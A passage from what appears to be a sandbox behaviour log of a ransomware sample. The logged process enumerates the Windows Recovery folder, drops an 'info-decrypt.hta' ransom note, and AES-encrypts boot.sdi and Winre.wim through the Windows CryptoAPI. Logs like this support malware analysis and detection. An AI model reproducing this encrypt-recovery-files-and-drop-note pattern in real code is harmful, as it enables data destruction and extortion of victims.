lpFindFileData=0x937ed84*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.631] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ed94 | out: lpFindFileData=0x937ed94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.631] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ed94 | out: lpFindFileData=0x937ed94*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0132.632] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ed94 | out: lpFindFileData=0x937ed94*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0132.632] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ed94 | out: lpFindFileData=0x937ed94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.632] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937f01c) returned 1 [0132.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937f028) returned 1 [0132.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937f05c) returned 1 [0132.632] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", nBufferLength=0x105, lpBuffer=0x937eb64, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpFilePart=0x0) returned 0x30 [0132.632] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", nBufferLength=0x105, lpBuffer=0x937eb38, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpFilePart=0x0) returned 0x31 [0132.632] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x937ed84 | out: lpFindFileData=0x937ed84*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.633] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ed94 | out: lpFindFileData=0x937ed94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.633] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ed94 | out: lpFindFileData=0x937ed94*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0132.633] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ed94 | out: lpFindFileData=0x937ed94*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0132.633] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x937ed94 | out: lpFindFileData=0x937ed94*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0132.634] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937f01c) returned 1 [0132.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937f028) returned 1 [0132.634] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x937ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0132.634] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x937ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", lpFilePart=0x0) returned 0x41 [0132.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937ef38) returned 1 [0132.634] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x937efb4 | out: lpFileInformation=0x937efb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0132.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937ef34) returned 1 [0132.634] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x937ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0132.634] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x937e978, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", lpFilePart=0x0) returned 0x41 [0132.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937ee6c) returned 1 [0132.634] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x578 [0132.636] GetFileType (hFile=0x578) returned 0x1 [0132.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937ee68) returned 1 [0132.636] GetFileType (hFile=0x578) returned 0x1 [0132.636] WriteFile (in: hFile=0x578, lpBuffer=0x38f5e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x937ef30, lpOverlapped=0x0 | out: lpBuffer=0x38f5e30*, lpNumberOfBytesWritten=0x937ef30*=0x1000, lpOverlapped=0x0) returned 1 [0132.638] WriteFile (in: hFile=0x578, lpBuffer=0x38f5e30*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x937ef04, lpOverlapped=0x0 | out: lpBuffer=0x38f5e30*, lpNumberOfBytesWritten=0x937ef04*=0x55e, lpOverlapped=0x0) returned 1 [0132.638] CloseHandle (hObject=0x578) returned 1 [0132.639] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x937ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0132.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937ef84) returned 1 [0132.639] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), fInfoLevelId=0x0, lpFileInformation=0x38f6e4c | out: lpFileInformation=0x38f6e4c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000)) returned 1 [0132.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937ef80) returned 1 [0132.640] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x937e9c4, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0132.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937eeb8) returned 1 [0132.640] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x578 [0132.640] GetFileType (hFile=0x578) returned 0x1 [0132.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937eeb4) returned 1 [0132.640] GetFileType (hFile=0x578) returned 0x1 [0132.641] GetFileSize (in: hFile=0x578, lpFileSizeHigh=0x937efc0 | out: lpFileSizeHigh=0x937efc0*=0x0) returned 0x306000 [0133.429] ReadFile (in: hFile=0x578, lpBuffer=0x44d94b0, nNumberOfBytesToRead=0x306000, lpNumberOfBytesRead=0x937ef6c, lpOverlapped=0x0 | out: lpBuffer=0x44d94b0*, lpNumberOfBytesRead=0x937ef6c*=0x306000, lpOverlapped=0x0) returned 1 [0133.836] CloseHandle (hObject=0x578) returned 1 [0135.688] CryptAcquireContextW (in: phProv=0x937ef0c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x937ef0c*=0xbe0690) returned 1 [0137.261] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0137.261] CryptGenRandom (in: hProv=0xbe0690, dwLen=0x10, pbBuffer=0x37ab9b4 | out: pbBuffer=0x37ab9b4) returned 1 [0137.263] GetProcAddress (hModule=0x75230000, lpProcName="CryptCreateHash") returned 0x7523556b [0137.268] GetProcAddress (hModule=0x75230000, lpProcName="CryptHashData") returned 0x752357b2 [0137.269] GetProcAddress (hModule=0x75230000, lpProcName="CryptGetHashParam") returned 0x75235ecc [0137.269] GetProcAddress (hModule=0x75230000, lpProcName="CryptDestroyHash") returned 0x75235985 [0141.489] CryptImportKey (in: hProv=0xbe0690, pbData=0x3749068, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x937eedc | out: phKey=0x937eedc*=0xb7f5d0) returned 1 [0141.489] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.489] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.489] CryptDuplicateKey (in: hKey=0xb7f5d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x937eecc | out: phKey=0x937eecc*=0xb7f610) returned 1 [0141.489] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0141.489] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x4, pbData=0x3749148*=0x1, dwFlags=0x0) returned 1 [0141.489] CryptSetKeyParam (hKey=0xb7f610, dwParam=0x1, pbData=0x3749114, dwFlags=0x0) returned 1 [0141.512] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4895460*, pdwDataLen=0x937ef38*=0x306010, dwBufLen=0x306010 | out: pbData=0x4895460*, pdwDataLen=0x937ef38*=0x306010) returned 1 [0141.685] CryptEncrypt (in: hKey=0xb7f610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35898c0*, pdwDataLen=0x937ef40*=0x0, dwBufLen=0x10 | out: pbData=0x35898c0*, pdwDataLen=0x937ef40*=0x10) returned 1 [0141.687] CryptDestroyKey (hKey=0xb7f5d0) returned 1 [0141.687] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0141.687] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0141.687] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x937e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0141.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937eea4) returned 1 [0141.687] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0141.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937dce0) returned 1 [0141.689] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", nBufferLength=0x105, lpBuffer=0x937ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpFilePart=0x0) returned 0x3a [0141.689] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x937ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", lpFilePart=0x0) returned 0x41 [0141.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937ef38) returned 1 [0141.689] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x937efb4 | out: lpFileInformation=0x937efb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf7a1c0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xdf7a1c0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xdf7a1c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0141.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937ef34) returned 1 [0141.689] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", nBufferLength=0x105, lpBuffer=0x937ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpFilePart=0x0) returned 0x3a [0141.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937ef84) returned 1 [0141.689] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), fInfoLevelId=0x0, lpFileInformation=0x358a8f4 | out: lpFileInformation=0x358a8f4*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012)) returned 1 [0142.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937ef80) returned 1 [0142.134] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", nBufferLength=0x105, lpBuffer=0x937e9c4, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpFilePart=0x0) returned 0x3a [0142.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937eeb8) returned 1 [0142.134] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0142.134] GetFileType (hFile=0x4e0) returned 0x1 [0142.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937eeb4) returned 1 [0142.134] GetFileType (hFile=0x4e0) returned 0x1 [0142.134] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x937efc0 | out: lpFileSizeHigh=0x937efc0*=0x0) returned 0xa160012 [0142.138] ReadFile (in: hFile=0x4e0, lpBuffer=0xb7c1018, nNumberOfBytesToRead=0xa160012, lpNumberOfBytesRead=0x937ef6c, lpOverlapped=0x0 | out: lpBuffer=0xb7c1018*, lpNumberOfBytesRead=0x937ef6c*=0xa160012, lpOverlapped=0x0) returned 1 [0187.828] CloseHandle (hObject=0x4e0) returned 1 [0187.828] CryptAcquireContextW (in: phProv=0x937ef0c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x937ef0c*=0x66ba630) returned 1 [0187.829] CryptGenRandom (in: hProv=0x66ba630, dwLen=0x10, pbBuffer=0x366b23c | out: pbBuffer=0x366b23c) returned 1 [0188.677] CryptImportKey (in: hProv=0x66ba630, pbData=0x36551c0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x937eedc | out: phKey=0x937eedc*=0xb7f950) returned 1 [0188.677] CryptContextAddRef (hProv=0x66ba630, pdwReserved=0x0, dwFlags=0x0) returned 1 [0188.677] CryptContextAddRef (hProv=0x66ba630, pdwReserved=0x0, dwFlags=0x0) returned 1 [0188.677] CryptDuplicateKey (in: hKey=0xb7f950, pdwReserved=0x0, dwFlags=0x0, phKey=0x937eecc | out: phKey=0x937eecc*=0xb7f090) returned 1 [0188.677] CryptContextAddRef (hProv=0x66ba630, pdwReserved=0x0, dwFlags=0x0) returned 1 [0188.677] CryptSetKeyParam (hKey=0xb7f090, dwParam=0x4, pbData=0x36552a0*=0x1, dwFlags=0x0) returned 1 [0188.677] CryptSetKeyParam (hKey=0xb7f090, dwParam=0x1, pbData=0x365526c, dwFlags=0x0) returned 1 [0192.746] CryptEncrypt (in: hKey=0xb7f090, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21c61018*, pdwDataLen=0x937ef38*=0xa160020, dwBufLen=0xa160020 | out: pbData=0x21c61018*, pdwDataLen=0x937ef38*=0xa160020) returned 1 [0199.208] CryptEncrypt (in: hKey=0xb7f090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3744f38*, pdwDataLen=0x937ef40*=0x0, dwBufLen=0x10 | out: pbData=0x3744f38*, pdwDataLen=0x937ef40*=0x10) returned 1 [0199.210] CryptDestroyKey (hKey=0xb7f950) returned 1 [0199.210] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0199.210] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0199.210] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", nBufferLength=0x105, lpBuffer=0x937e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpFilePart=0x0) returned 0x3a [0199.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x937eea4) returned 1 [0199.210] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0199.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x937dce0) returned 1 [0199.212] CoUninitialize () [0199.213] SysReAllocStringLen (in: pbstr=0x937fa38*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x937fa38*="KERNEL32.DLL") returned 1 [0199.213] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.214] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.217] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 119 os_tid = 0x72c [0132.671] SysReAllocStringLen (in: pbstr=0x657f95c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f95c*="KERNEL32.DLL") returned 1 [0132.671] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.671] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.674] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.674] SysReAllocStringLen (in: pbstr=0x657f95c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f95c*="KERNEL32.DLL") returned 1 [0132.674] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.677] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.677] SysReAllocStringLen (in: pbstr=0x657f938*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x657f938*="KERNEL32.DLL") returned 1 [0132.677] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.678] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.680] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0132.682] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0143.087] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0167.598] CoGetContextToken (in: pToken=0x657f61c | out: pToken=0x657f61c) returned 0x0 [0167.598] IUnknown:QueryInterface (in: This=0xb51e28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x657f640 | out: ppvObject=0x657f640*=0xb51e34) returned 0x0 [0167.598] IComThreadingInfo:GetCurrentThreadType (in: This=0xb51e34, pThreadType=0x657f66c | out: pThreadType=0x657f66c*=0) returned 0x0 [0167.598] IUnknown:Release (This=0xb51e34) returned 0x1 [0167.598] GetCurrentThreadId () returned 0x72c [0167.598] ResetEvent (hEvent=0xb8) returned 1 [0167.598] GetCurrentThreadId () returned 0x72c [0167.598] GetCurrentThreadId () returned 0x72c [0167.598] GetCurrentThreadId () returned 0x72c [0167.599] ResetEvent (hEvent=0xb8) returned 1 [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] SetEvent (hEvent=0xbc) returned 1 [0167.599] SetEvent (hEvent=0xb8) returned 1 [0167.599] CloseHandle (hObject=0x5a4) returned 1 [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] ResetEvent (hEvent=0xb8) returned 1 [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] ResetEvent (hEvent=0xb8) returned 1 [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] SetEvent (hEvent=0xbc) returned 1 [0167.599] SetEvent (hEvent=0xb8) returned 1 [0167.599] CloseHandle (hObject=0x594) returned 1 [0167.599] GetCurrentThreadId () returned 0x72c [0167.599] ResetEvent (hEvent=0xb8) returned 1 [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] GetCurrentThreadId () returned 0x72c [0167.600] 